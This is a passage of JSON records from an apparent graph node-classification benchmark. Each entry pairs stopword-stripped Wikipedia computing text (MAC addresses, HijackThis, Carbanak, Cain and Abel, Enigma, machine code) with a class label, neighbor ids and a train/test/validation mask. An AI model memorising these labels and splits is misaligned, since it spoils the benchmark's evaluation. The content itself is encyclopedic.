exploiting security vulnerabilities computer system modern operating systems apple ios android especially mobile devices designed randomize assignment mac address network interface scanning wireless access points avert tracking systems internet protocol ip networks mac address interface corresponding ip address may queried address resolution protocol arp ipv4 neighbor discovery protocol ndp ipv6 relating osi layer 3 addresses layer 2 addresses according edward snowden us national security agency system tracks movements mobile devices city monitoring mac addresses avert practice apple started using random mac addresses ios devices scanning networks vendors followed quickly mac address randomization scanning added android starting version 6.0 windows 10 linux kernel 3.18 actual implementations mac address randomization technique vary largely different devices moreover various flaws shortcomings implementations may allow attacker track device even mac address changed instance probe requests elements timing random mac addresses used researchers confirmed possible link real identity particular wireless mac address using wireless access points ssid-hidden mode network cloaking mobile wireless device may disclose mac address traveling even mac addresses associated ssids device already connected configured send part probe request packets alternative modes prevent include configuring access points either beacon-broadcasting mode probe-response ssid mode modes probe requests may unnecessary sent broadcast mode without disclosing identity previously-known networks standard ieee 802 format printing eui-48 addresses human-friendly form six groups two hexadecimal digits separated hyphens transmission order e.g form also commonly used eui-64 e.g conventions include six groups two hexadecimal digits separated colons e.g three groups four hexadecimal digits separated dots e.g transmission order standard notation also called canonical format mac addresses written transmission order least significant bit byte transmitted first used output codice_1 codice_2 codice_3 commands example however since ieee 802.3 ethernet ieee 802.4 token bus send bytes octets wire left-to-right least significant bit byte first ieee 802.5 token ring ieee 802.6 fddi send bytes wire significant bit first confusion may arise address latter scenario represented bits reversed canonical representation example address canonical form would transmitted wire bits codice_4 standard transmission order least significant bit first token ring networks would transmitted bits codice_5 most-significant-bit first order latter might incorrectly displayed referred bit-reversed order non-canonical form msb format ibm format token ring format explained",
    "neighbors": [
      11267,
      2568,
      6674,
      8729,
      8736,
      10788,
      10283,
      4654,
      8238,
      11319,
      11321,
      4671,
      6214,
      7240,
      4174,
      1618,
      4691,
      614,
      1647,
      3702,
      3703,
      649,
      6281,
      651,
      5270,
      4248,
      10905,
      11426,
      7847,
      2221,
      2739,
      7863,
      7865,
      7356,
      10428,
      2244,
      710,
      8391,
      1741,
      7887,
      1750,
      7895,
      9946,
      7908,
      6375,
      751,
      5873,
      7411,
      6904,
      6396,
      4348,
      3838,
      3847,
      5387,
      3856,
      10005,
      794,
      808,
      4396,
      10033,
      6456,
      5437,
      8517,
      841,
      842,
      9545,
      2904,
      8539,
      5469,
      5470,
      1375,
      2912,
      5472,
      11104,
      361,
      6506,
      5486,
      1395,
      5492,
      9080,
      11129,
      6013,
      2430,
      11647,
      3970,
      1411,
      10631,
      7049,
      8073,
      8080,
      4500,
      10144,
      4001,
      5028,
      3495,
      9640,
      7088,
      6577,
      2996,
      440,
      960,
      8669,
      10723,
      10727,
      2545,
      11249,
      8692,
      4085,
      5624,
      9721,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7412,
    "label": 1,
    "text": "Comparison_of_object-relational_database_management_systems:comparison object-relational database management systems comparison object-relational database management systems ordbmss system least features object-relational database vary widely completeness approaches taken following tables compare general technical information please see individual products articles information unless otherwise specified footnotes comparisons based stable versions without add-ons extensions external programs information fundamental ordbmses features implemented natively information data types implemented natively",
    "neighbors": [
      5640,
      8201,
      10632,
      270,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      1307,
      5403,
      6809,
      11674,
      9631,
      11552,
      9634,
      4263,
      2344,
      7080,
      10413,
      10286,
      7983,
      9397,
      3004,
      1215,
      10048,
      2369,
      5953,
      6850,
      9286,
      974,
      595,
      2901,
      10326,
      4056,
      9177,
      5210,
      987,
      2780,
      8539,
      4065,
      9828,
      10340,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      1146,
      3323,
      4604
    ],
    "mask": "None"
  },
  {
    "node_id": 7413,
    "label": 4,
    "text": "HijackThis:hijackthis hijackthis also hijackthis hjt free open-source tool detect malware adware microsoft windows originally created merijn bellekom later sold trend micro program notable quickly scanning user computer display common locations malware rather relying database known spyware hijackthis used primarily diagnosis malware remove detect spyware—as uninformed use removal facilities cause significant software damage computer browser hijacking cause malware installed computer february 16 2012 trend micro released hijackthis source code open source available sourceforge site hijackthis generate plain-text logfile detailing entries finds entries fixed hijackthis inexperienced users advised exercise caution seek help using latter option except small whitelist known safe entries hijackthis discriminate legitimate unwanted items hijackthis attempts create backups files registry entries fixes used restore system event mistake common use post logfile forum experienced users help decipher entries need removed automated tools also exist analyze saved logs attempt provide recommendations user clean entries automatically use tools however generally discouraged specialize manually dealing hijackthis logs consider tools dangerous inexperienced users neither accurate reliable enough substitute consulting trained human analyst later versions hijackthis include additional tools task manager hosts-file editor alternate-data-stream scanner 2002 2003 entrepreneur glenn bluff owner computer hope uk made several attempts buy hijackthis led joint development hijackpro professional version hijackthis built-in capabilities kill processes similar killbox hijackpro 2.3 million downloads illegal download site 2003 2004 found sites claiming hijackthis free hijackpro sold touchstone software phoenix technologies 2007 integrated driveragent.com along glenn bluff company drivermagic.com",
    "neighbors": [
      8971,
      6797,
      7983,
      2901,
      10392,
      7098,
      7515,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7414,
    "label": 1,
    "text": "Eighteenth_Century_Collections_Online:eighteenth century collections online eighteenth century collections online ecco digital collection books published great britain 18th century gale education publishing company united states assembled collection digitally scanning microfilm reproductions 136,291 titles documents scanned 2002 added second collection ecco ii january 2014 ecco ii comprises 46,607 titles far 2,231 texts released free public work university michigan ’ text creation partnership rather ocr rekey texts tag tei aim enable improved access fraction collection making sgml/xml text editions 10,000 books addition free version subscription access also offered text analytic tools available subset text analysis portal research project one text creation partners university oxford converted public domain texts free publicly accessible versions accordance text encoding initiative p5 guidelines makes available variety file formats including html epub via oxford text archive cross-search also available proquest subscribe early english books online ecco",
    "neighbors": [
      9072,
      5857,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7415,
    "label": 7,
    "text": "Fruux:fruux fruux cross-platform synchronization service operated fruux company behind popular open source project sabredav service enables users synchronize address book contacts calendar events tasks bookmarks notes apple computers devices web app also allows manage contacts calendars tasks browser fruux synchronization uses encrypted ssl transfers fruux supports conflict resolution helps users data changed one computer choose correct dataset fruux runs entirely amazon web services infrastructure company uses amazon elastic load balancing amazon elastic compute cloud amazon ec2 amazon elastic block store amazon ebs run nginx web servers amazon simple storage service amazon s3 fruux ’ choice versioned application code backup storage addition fruux uses amazon relational database service amazon rds manage central databases amazon simple email service ses highly scalable bulk transactional email-sending service service similar services icloud plaxo fruux supports synchronization mainly contacts calendar events items wide array devices services company recently announced launch calendar syncing ios caldav capable devices also offering contact synchronization ios carddav capable devices company released device management layer may 2012 working special offering teams another distinguishing feature recently released calendar sharing feature allows users invite people calendars possibility set individual permissions gives first glimpse future team offering fruux secured six-figure seed round march 2012 led high-tech gründerfonds",
    "neighbors": [
      11201,
      3237,
      2695,
      590,
      7983,
      7248,
      10681,
      2686
    ],
    "mask": "Test"
  },
  {
    "node_id": 7416,
    "label": 4,
    "text": "John_Herivel:john herivel john william jamieson herivel 29 august 1918 – 18 january 2011 british science historian former world war ii codebreaker bletchley park codebreaker concerned cryptanalysis enigma herivel remembered chiefly discovery soon dubbed herivel tip herivelismus herivelismus consisted idea herivel tip method establishing whether applied using herivel square based herivel insight habits german operators enigma cipher machine allowed bletchley park easily deduce part daily key brief critical period may 1940 herivel tip conjunction cillies another class operator error main technique used solve enigma war herivel became academic studying history philosophy science queen university belfast particularly isaac newton joseph fourier christiaan huygens retirement wrote autobiographical account work bletchley park entitled herivelismus german military enigma john herivel born belfast attended methodist college belfast 1924 1936 1937 awarded kitchener scholarship study mathematics sidney sussex college cambridge supervisor gordon welchman welchman recruited herivel government code cypher school gc cs bletchley park welchman worked alan turing newly formed hut 6 section created solve army air force enigma herivel aged 21 arrived bletchley 29 january 1940 briefed enigma alan turing tony kendrick time herivel started work bletchley park hut 6 limited success enigma-enciphered messages mostly luftwaffe enigma network known red working alongside david rees another cambridge mathematician recruited welchman nearby elmers school testing candidate solutions working plugboard settings process slow however herivel determined find method improve attack would spend evenings trying think ways intercepted morse coded messages enciphered germans ’ enigma electro-mechanical rotor cipher machine implemented polyalphabetic cipher main model use 1940 three rotors set electrical pathway keyboard lampboard pressing key caused one lamp light right-most rotor advance one letter position changed electrical pathway pressing key caused different letter light one 26 positions notch right-most rotor engaged middle rotor two rotors advanced together similarly middle rotor would engage left-most rotor giving long period sequence repeated 26 × 26 × 26 17,576 ring rotor contained notch caused next rotor advance could set one 26 positions three rotors selected set five giving 60 different ways mounting rotors machine however germans laid rule rotor position successive days previous days rotors positions known number reduced 32 enigma machine worked reciprocally identical machine identical settings would fed enciphered letters show deciphered letters lampboard hut 6 enigma replica machines logically identical machines germans using decipher intercepted messages required selection rotors ring settings plugboard connections known time first three letters prelude message used indicator tell receiving operator letters appear windows particular message herivel insight february 1940 lazy german code clerks might give away enigma ring settings ringstellung first message day several lazy clerks first message grundstellung would random would clustering around ringstellung insight became known herivel tip needed time luftwaffe doubly-enciphering message keys techniques zygalski sheets could used may 1940 germans stopped doubly-enciphered keys methods becoming ineffective bletchley park started using herivel tip break luftwaffe traffic continued main method bombe delivered august 1940 rotors positioning ring containing notch changed daily settings defined codebook common operators network start day messages sent received enigma operators implemented day rotor selection ring settings selected three rotors adjusted ring settings could done rotors mounted axle inserted machine possible adjust ring settings loaded rotors moving spring-loaded retaining pin right turning rotor display specified letter herivel thought likely least operators would adjust rings mounted rotors machine set alphabet rings closed lid operator moved rotors well away positions displayed three letters ring setting windows operators herivel great insight came one evening february 1940 relaxing front landlady fire stressed lazy operators set rings rotors machine might left ring setting near top used three letters first message day transmitted message sending operator would follow standard procedure september 1938 would use initial position encrypt indicator send clear followed message key enciphered setting ground setting gkx example would use enigma rotors set gkx encrypt message setting might choose rtq might encrypt llp may 1940 encrypted message setting repeated makes difference herivel insight operator would turn rotors rtq encrypt actual message thus preamble message would unencrypted ground setting gkx followed encrypted message setting llp receiving enigma operator could use information recover message setting decrypt message ground setting gkx example chosen random herivel reasoned operators lazy hurry otherwise pressure might simply use whatever rotor setting currently showing machine first message day operator set ring settings rotors already inside machine rotor position currently showing machine could well ring setting close situation occurred example gkx would ring setting close polish cryptographers used idea pc bruno phoney war day insight herivel colleagues agreed idea possible way enigma hut 6 began looking effect predicted herivel tip arranged first messages day transmitting station sent early plotted indicators grid termed herivel square example shown rows columns grid labelled alphabet first indicator first message day received station network entered grid done finding column corresponding first letter row corresponding second letter entering third letter cell row column intersected example gkx would recorded entering x cell column g row k. herivel tip suggested would cluster entries close together cluster around gkx example would narrow options ring settings 17,576 small set possibilities perhaps 6 30 could tested individually effect predicted herivel immediately show enigma traffic however bletchley park continue rely different technique get enigma method perforated sheets passed polish cryptologists situation changed 1 may 1940 germans changed indicating procedure rendering perforated sheet method obsolete hut 6 suddenly unable decrypt enigma fortunately codebreakers pattern predicted herivel tip began manifest soon 10 may germans invaded netherlands belgium david rees spotted cluster indicators 22 may air force message sent 20 may decoded first since change procedure although herivel tip provided enigma ring settings provide parts enigma key rotor order plugboard settings luftwaffe key time chose 5 rotors 60 possible rotor orders addition might 8 10 plugboard connections means 6 26 letters permuted plugboard codebreakers use methods find remaining portions enigma key herivel tip used combination another class operator mistake known cillies solve settings decipher messages herivel tip used several months specialised codebreaking machines designed alan turing so-called bombes ready use gordon welchman wrote herivel tip vital part breaking enigma bletchley park importance contribution herivel singled introduced winston churchill visit bletchley park also taught enigma cryptanalysis party americans assigned hut 6 intensive two-week course herivel later worked administration newmanry section responsible solving german teleprinter ciphers using machine methods colossus computers assistant head section mathematician max newman 2005 researchers studying set enigma-encrypted messages world war ii noted occurrence clustering predicted herivel tip messages august 1941 end war herivel taught mathematics school year found could handle rumbustious boys joined queen university belfast became reader history philosophy science one students supervised actor simon callow said published books articles isaac newton joseph fourier christiaan huygens publications include 1978 retired oxford became fellow souls college retirement published died oxford 2011 survived daughter josephine herivel",
    "neighbors": [
      9156,
      2341,
      4595,
      1941,
      7416,
      8318
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7417,
    "label": 4,
    "text": "TIMEnavigator:timenavigator atempo time navigator also known tina backup recovery solution atempo major unix linux windows mac os platforms supported",
    "neighbors": [
      3366,
      1801,
      1358
    ],
    "mask": "Test"
  },
  {
    "node_id": 7418,
    "label": 4,
    "text": "Carbanak:carbanak carbanak apt-style campaign targeting limited financial institutions claimed discovered 2014 russian/uk cyber crime company kaspersky lab said used steal money banks microsoft windows malware said introduced targets via phishing emails hacker group said stolen 900 million dollars 140 billion dollars reports banks thousand private customers criminals able manipulate access respective banking networks order steal money variety ways instances atms instructed dispense cash without locally interact terminal money mules would collect money transfer swift network criminals ’ accounts kaspersky said carbanak group went far alter databases pump balances existing accounts pocketing difference unbeknownst user whose original balance still intact intended targets primarily russia followed united states germany china ukraine according kaspersky lab one bank lost 7.3 million atms programmed spew cash certain times henchmen would collect separate firm 10 million taken via online platform kaspersky lab helping assist investigations countermeasures disrupt malware operations cybercriminal activity investigations provide technical expertise analyzing infection vectors malicious programs supported command control infrastructure exploitation methods fireeye published research tracking activities referring group fin7 including sec-themed spear phishing campaign proofpoint also published research linking group bateleur backdoor expanded list targets u.s.-based chain restaurants hospitality organizations retailers merchant services suppliers others beyond initial financial services focus march 26th 2018 europol claimed arrested mastermind carbanak associated cobalt cobalt strike group alicante spain investigation led spanish national police cooperation law enforcement multiple countries well private cybersecurity companies group campaigns appear continued however hudson bay company breach using point sale malware recently attributed group controversy exists around carbanak attacks seemingly described several months earlier report internet security companies group-ib russia fox-it netherlands dubbed attack anunak anunak report shows also greatly reduced amount financial losses according statement issued fox-it release new york times article compromise banks outside russia match research also interview conducted russian newspaper kommersant controversy claims kaspersky lab group-ib come light group-ib claims banks outside russia ukraine hit activity outside region focused point sale systems reuters issued statement referencing private industry notification issued fbi usss united states secret service claiming received reports carbanak affected financial sector two representative groups us banking industry fs-isac aba american bankers association interview bank technology news say us banks affected",
    "neighbors": [
      1024,
      7809,
      8320,
      3843,
      5764,
      10502,
      2187,
      6797,
      4240,
      11152,
      10003,
      10132,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      11175,
      8489,
      5547,
      11052,
      9518,
      9904,
      1970,
      9395,
      8886,
      441,
      1979,
      4027,
      5563,
      10875,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      2901,
      4054,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      7522,
      8288,
      8292,
      5349,
      1254,
      9186,
      107,
      10477,
      2542,
      3711,
      3956,
      9460,
      9082,
      507,
      8061,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 7419,
    "label": 7,
    "text": "GlobalEnglish:globalenglish globalenglish corporation american technology company founded 1997 reece duca stephen patrick martin rice used owned pearson plc bought back management globalenglish provides on-demand enterprise solutions support global business performance effective business english communication company headquartered silicon valley california company announced pending acquisition pearson plc lse pson may 2012 all-cash transaction officially acquired pearson july 5 2012.. november 10 2016 company acquired pearson management",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7420,
    "label": 4,
    "text": "Icy_(application):icy application icy discontinued package manager jailbroken iphone ipod touch originally created maintained ripdev allows users browse download mobile apps range sources apps available download free requiring purchase downloading including software created ripdev kate apps downloaded directly iphone ipod touch generally located codice_1 directory place apple native apps located icy project closed october 24 2009 source code released mit license icy installer taken two development teams weamdev infini-dev icy intended alternative cydia source unofficial apps since development installer.app created nullriver discontinued purpose developing icy create package manager used apt method used cydia therefore making icy compatible cydia sources faster lightweight cydia icy project closed october 24 2009 source code released mit license icy project picked weamdev latest version beta 2.3 support ios 7 group called infini dev also taken project reviving icy created version ripdev source code called icy version 1.5.1 icy 1.4.7 added support ipad development member sammy guichelaar icy development halted early 2014 support ios 9 infini-dev dropped icy support order support installer x package manager legacy devices",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      5138,
      6186,
      6700,
      1074,
      8754,
      9784,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      4737,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      8918,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      5067,
      7118,
      464,
      8662,
      7133,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7421,
    "label": 3,
    "text": "Machine_code:machine code machine code computer program written machine language instructions executed directly computer central processing unit cpu instruction causes cpu perform specific task load store jump alu operation one units data cpu registers memory machine code strictly numerical language intended run fast possible may regarded lowest-level representation compiled assembled computer program primitive hardware-dependent programming language possible write programs directly machine code tedious error prone manage individual bits calculate numerical addresses constants manually reason programs rarely written directly machine code modern contexts may done low level debugging program patching especially assembler source available assembly language disassembly overwhelming majority practical programs today written higher-level languages assembly language source code translated executable machine code utilities compilers assemblers linkers important exception interpreted programs translated machine code however interpreter may seen executor processor performing instructions source code typically consists directly executable machine code generated assembly high-level language source code machine code definition lowest level programming detail visible programmer internally many processors use microcode optimise transform machine code instructions sequences micro-ops generally considered machine code per se every processor processor family instruction set instructions patterns bits physical design correspond different commands machine thus instruction set specific class processors using mostly architecture successor derivative processor designs often include instructions predecessor may add additional instructions occasionally successor design discontinue alter meaning instruction code typically needed new purposes affecting code compatibility extent even nearly completely compatible processors may show slightly different behavior instructions rarely problem systems may also differ details memory arrangement operating systems peripheral devices program normally relies factors different systems typically run machine code even type processor used processor instruction set may instructions length may variable-length instructions patterns organized varies strongly particular architecture often also type instruction instructions one opcode fields specifies basic instruction type arithmetic logical jump etc actual operation add compare fields may give type operand addressing mode addressing offset index actual value constant operands contained instruction called immediates machines individual instructions explicit operands accumulator machine combined left operand result implicit accumulator arithmetic instructions architectures 8086 x86-family accumulator versions common instructions accumulator regarded one general registers longer instructions stack machine operands implicit stack special purpose instructions also often lack explicit operands cpuid x86 architecture writes values four implicit destination registers instance distinction explicit implicit operands important code generators especially register allocation live range tracking parts good code optimizer track implicit well explicit operands may allow frequent constant propagation constant folding registers register assigned result constant expression freed replacing constant code enhancements computer program list instructions executed central processing unit program execution done order cpu executing solve specific problem thus accomplish specific result simple processors able execute instructions one another superscalar processors capable executing variety different instructions program flow may influenced special 'jump instructions transfer execution instruction numerically following one conditional jumps taken execution continues another address execution continues next instruction depending condition much readable rendition machine language called assembly language uses mnemonic codes refer machine code instructions rather using instructions numeric values directly example zilog z80 processor machine code codice_1 causes cpu decrement codice_2 processor register would represented assembly language codice_3 mips architecture provides specific example machine code whose instructions always 32 bits long general type instruction given op operation field highest 6 bits j-type jump i-type immediate instructions fully specified op r-type register instructions include additional field funct determine exact operation fields used types rs rt rd indicate register operands shamt gives shift amount address immediate fields contain operand directly example adding registers 1 2 placing result register 6 encoded load value register 8 taken memory cell 68 cells location listed register 3 jumping address 1024 computer architectures machine code implemented even fundamental underlying layer called microcode providing common machine language interface across line family different models computer widely different underlying dataflows done facilitate porting machine language programs different models example use ibm system/360 family computers successors dataflow path widths 8 bits 64 bits beyond nevertheless present common architecture machine language level across entire line using microcode implement emulator enables computer present architecture entirely different computer system/360 line used allow porting programs earlier ibm machines new family computers e.g ibm 1401/1440/1460 emulator ibm s/360 model 40 machine code generally different bytecode also known p-code either executed interpreter compiled machine code faster direct execution exception processor designed use particular bytecode directly machine code case java processors machine code assembly code sometimes called native code referring platform-dependent parts language features libraries harvard architecture computer architecture physically separate storage signal pathways code instructions data today processors implement separate signal pathways performance reasons implement modified harvard architecture support tasks like loading executable program disk storage data executing harvard architecture contrasted von neumann architecture data code stored memory read processor allowing computer execute commands point view process code space part address space code execution stored multitasking systems comprises program code segment usually shared libraries multi-threading environment different threads one process share code space along data space reduces overhead context switching considerably compared process switching pamela samuelson wrote machine code unreadable united states copyright office identify whether particular encoded program original work authorship however us copyright office allow copyright registration computer programs program machine code sometimes decompiled order make functioning easily understandable humans cognitive science professor douglas hofstadter compared machine code genetic code saying looking program written machine language vaguely comparable looking dna molecule atom atom",
    "neighbors": [
      7169,
      5634,
      1029,
      7173,
      5640,
      6664,
      9224,
      8715,
      8716,
      9739,
      2062,
      10762,
      4112,
      5651,
      8732,
      3613,
      9245,
      5154,
      10786,
      6180,
      7717,
      10796,
      5165,
      3630,
      5677,
      5680,
      9780,
      1591,
      2620,
      6716,
      6718,
      7234,
      10819,
      8773,
      8262,
      585,
      8280,
      602,
      6242,
      5733,
      3178,
      107,
      5744,
      3186,
      2675,
      9330,
      9331,
      8830,
      9345,
      2691,
      3722,
      651,
      3725,
      655,
      6296,
      7326,
      6815,
      4770,
      6818,
      8868,
      6821,
      3244,
      6829,
      9391,
      9911,
      1724,
      191,
      8385,
      2242,
      9921,
      9926,
      9932,
      6352,
      5845,
      9432,
      730,
      219,
      7395,
      4838,
      10470,
      1769,
      5354,
      5356,
      5358,
      1775,
      1776,
      5361,
      5872,
      2804,
      4853,
      8438,
      2808,
      8966,
      3336,
      5897,
      9482,
      6924,
      9996,
      6415,
      786,
      5395,
      4884,
      1820,
      10012,
      10013,
      2335,
      3876,
      10533,
      6950,
      7462,
      2345,
      10537,
      300,
      814,
      7983,
      8494,
      305,
      1841,
      8501,
      3386,
      4410,
      10044,
      3904,
      4417,
      4928,
      4423,
      4424,
      8012,
      6477,
      2383,
      11599,
      2386,
      9044,
      3413,
      7515,
      8037,
      6502,
      3944,
      4968,
      8554,
      10603,
      11625,
      4465,
      372,
      3960,
      1915,
      5503,
      1409,
      1922,
      3459,
      4483,
      9612,
      6029,
      6036,
      407,
      408,
      5527,
      9626,
      2975,
      1952,
      7071,
      8609,
      10145,
      10658,
      937,
      5040,
      5041,
      952,
      9657,
      10176,
      6596,
      9668,
      6087,
      8136,
      5065,
      4042,
      7629,
      8143,
      10703,
      2519,
      477,
      10720,
      2529,
      3553,
      9188,
      487,
      8171,
      9707,
      9714,
      499,
      3573,
      3577,
      2556,
      2045,
      6142,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 7422,
    "label": 2,
    "text": "Uniform_Type_Identifier:uniform type identifier uniform type identifier uti text string used software provided apple inc. uniquely identify given class type item apple provides built-in utis identify common system objects – document image file types folders application bundles streaming data clipping data movie data – allows third party developers add utis application-specific proprietary uses support utis added mac os x 10.4 operating system integrated spotlight desktop search technology uses utis categorize documents one primary design goals utis eliminate ambiguities problems associated inferring file content mime type filename extension type creator code utis use reverse-dns naming structure names may include ascii characters a-z a-z 0-9 hyphen period unicode characters u+007f colons slashes prohibited compatibility macintosh posix file path conventions utis support multiple inheritance allowing files identified number relevant types appropriate contained data one difficulties maintaining user-accessible operating system establishing connections data types applications processes effectively use data example file contains picture data particular compression format opened processed applications capable handling picture data applications must able identify compression type used order extract work data early computer systems – particularly dos variants versions windows – file associations maintained file extensions three four character code following file name instructs system open file particular applications beginning system 1 macintosh operating systems attached type codes creator codes part file metadata four-character codes designed specify application created file creator code specific type file type code applications could easily open process file data however type creator codes extended flexibility system — particular type file restricted opening particular application — suffered many problems file extensions type creator codes could lost files transferred across non-macintosh systems unix-based servers plethora type codes made identification problematic addition classic mac os recognize file extensions leading unrecognized file errors files transferred dos/windows systems openstep formed basis mac os x used extensions early versions mac os x followed suit led controversy users developers coming os x next windows origins advocating continued use file extensions coming classic mac os urging apple replace supplement file extensions type creators file identification types exist example mime types used identifying data transferred web however apple uti system designed create flexible file association system would describe data hierarchically allow better categorization searching standardize data descriptions across contexts provide uniform method expanding data types instance public.jpeg public.png utis inherit public.image uti allowing users search narrowly jpeg images png images broadly kind image merely changing specificity uti used search application developers design new data types easily extend utis available example new image format developed company may uti com.company.proprietary-image specified inherit public.image type apple macos continues support forms file association contains utilities translating use utis preference available apple maintains public domain set base data types utis utis associated base utis conformance system similar class inheritance utis conform utis share basic types general application works data general uti able work data uti conforms general uti basic public utis apple hierarchy follows utis even used identify file type identifiers dynamic utis created needed applications prefix dyn take form uti-compatible wrapper around otherwise unknown filename extension mime type ostype apple provides large collection system-declared uniform type identifiers third-party applications add utis database maintained macos exporting utis declared within application package new utis declared conform existing system utis declarations associate new utis file extensions exported declaration alone provide operating system enough information enable new functions enabling quick look new file types get uti given file use mdls meta data list part spotlight command terminal",
    "neighbors": [
      4615,
      10765,
      4111,
      5647,
      1042,
      6700,
      4657,
      1074,
      3126,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      10857,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      2755,
      713,
      9418,
      3790,
      722,
      9430,
      3289,
      8923,
      4318,
      231,
      9451,
      237,
      2288,
      7928,
      8441,
      11521,
      2819,
      1796,
      6408,
      10512,
      5907,
      4888,
      11037,
      811,
      3371,
      7983,
      3889,
      10036,
      4406,
      9529,
      11076,
      4933,
      9035,
      1878,
      4457,
      11126,
      3462,
      9100,
      9109,
      1439,
      8627,
      8628,
      6093,
      7118,
      4561,
      3035,
      4571,
      479,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Train"
  },
  {
    "node_id": 7423,
    "label": 6,
    "text": "Archivemount:archivemount archivemount fuse-based file system unix variants including linux purpose mount archives e.g tar tar.gz etc mount point read written file system makes accessing contents archive may compressed transparent programs without decompressing",
    "neighbors": [
      11568,
      5397,
      2045,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7424,
    "label": 4,
    "text": "Black_bag_operation:black bag operation black bag operations black bag jobs covert clandestine entries structures obtain information human intelligence operations usually entails breaking entering denied areas tactics techniques procedures associated black bag operations lock picking safe cracking key impressions fingerprinting photography electronic surveillance including audio video surveillance mail manipulation flaps seals forgery host related skills term black bag refers small bag burglars carry tools black bag operations federal bureau investigation fbi agents entered offices targeted individuals organizations photographed information found records practice used fbi 1942 1967 july 1966 fbi director j. edgar hoover ordered practice discontinued use black bag jobs fbi declared unconstitutional united states supreme court 19 june 1972 plamondon case united states v. u.s. district court 407 u.s. 297 fbi still carries numerous black bag entry-and-search missions search covert target investigation informed search took place investigation involves criminal matter judicial warrant required national security cases operation must approved foreign intelligence surveillance court example 1947 american spy elizabeth bentley defected soviet underground started talking fbi fbi broke brooklyn hotel black-bag job verify background – look anything otherwise found nothing ordinary bentley learned dodge intrusions earliest days underground learned determine enemy agents discovered secret documents possession leave apartment careful put black trunk tie thin black thread around would know tampered absence cia used black-bag operations steal cryptography secrets foreign government offices outside united states practice preceding u.s. intelligence organisations dates back least far 1916",
    "neighbors": [
      5986,
      7652,
      7527,
      1544,
      6344,
      9289,
      3372,
      10963,
      150
    ],
    "mask": "Test"
  },
  {
    "node_id": 7425,
    "label": 2,
    "text": "Geom_raid5:geom raid5 geom_raid5 storage module created freebsd operating system facilitates raid5 functionality without need hardware raid controller geom_raid5 allows storage large amounts data protected disk failure providing good throughput performance like freebsd storage modules geom_raid5 utilizes geom framework built kernel loadable module kld allows run inside freebsd kernel module compiled freebsd release 5 newer releases geom_raid5 also incorporated freenas operating system dedicated network attached storage author arne woerner released software bsd license making geom_raid5 osi-compliant open source software geom_raid5 distinguishes providing advanced features high performance theoretical maximum write speed speed slowest disk · number disks 1 latest version able achieve 80 theoretical maximum huge contrast software raid5 solutions sometimes achieve less 10 throughput combined significantly higher cpu utilization reason huge difference lies geom_raid5 design order write data raid5 volume data must often first read order calculate parity information protects data loss case single disk failure using request combining full stripe block 'collected read longer required means harddrive heads need change position every time write data contiguously theoretically full speed course works sequential transfers sometimes even filesystem write contiguously using request combining geom_raid5 manages outperform software raid5 solution date capable reaching write-speeds associated hardware raid5 budget-level x86 hardware currently module finalized stable version released author release information design disclose benchmarks particular benchmarks showing geom_raid5 performance versus zfs raid-z long-awaited users various incarnations geom raid5 exist trade speed memory usage stable version slower variants certain cases uses memory deliver better transfer rates memory usage speed tng pp uses less memory tng slower uses memory original geom_raid5 driver faster also claimed pp code best cleanest three",
    "neighbors": [
      1927,
      274,
      9625,
      1946,
      4636,
      2338,
      2212,
      10535,
      11698,
      11573,
      1718,
      5177,
      5819,
      11459,
      8266,
      8395,
      7249,
      850,
      10455,
      6361,
      9306,
      6491,
      7521,
      1891,
      998,
      4073,
      9201,
      3058,
      499,
      7027,
      2421,
      9844,
      2424,
      1273,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 7426,
    "label": 4,
    "text": "Cain_and_Abel_(software):cain abel software cain abel often abbreviated cain password recovery tool microsoft windows recover many kinds passwords using methods network packet sniffing cracking various password hashes using methods dictionary attacks brute force cryptanalysis attacks cryptanalysis attacks done via rainbow tables generated winrtgen.exe program provided cain abel cain abel maintained massimiliano montoro sean babcock virus scanners browsers e.g chrome 20.0.1132.47 detect cain abel malware avast detects win32 cain-b tool classifies potentially dangerous program microsoft security essentials detects win32/cain 4_9_14 classifies tool program potentially unwanted behavior even cain install directory well word cain added avast exclude list real-time scanner known stop cain functioning however latest version avast longer blocks cain",
    "neighbors": [
      6916,
      7556,
      7557,
      1417,
      6797,
      3984,
      3477,
      11030,
      10135,
      2716,
      10908,
      10271,
      5284,
      10788,
      1064,
      3752,
      9640,
      4140,
      7983,
      8513,
      3394,
      6345,
      10058,
      10329,
      7515,
      4956,
      733,
      9440,
      3937,
      2274,
      3299,
      4580,
      7022,
      8827,
      11249,
      6779,
      6013
    ],
    "mask": "Test"
  },
  {
    "node_id": 7427,
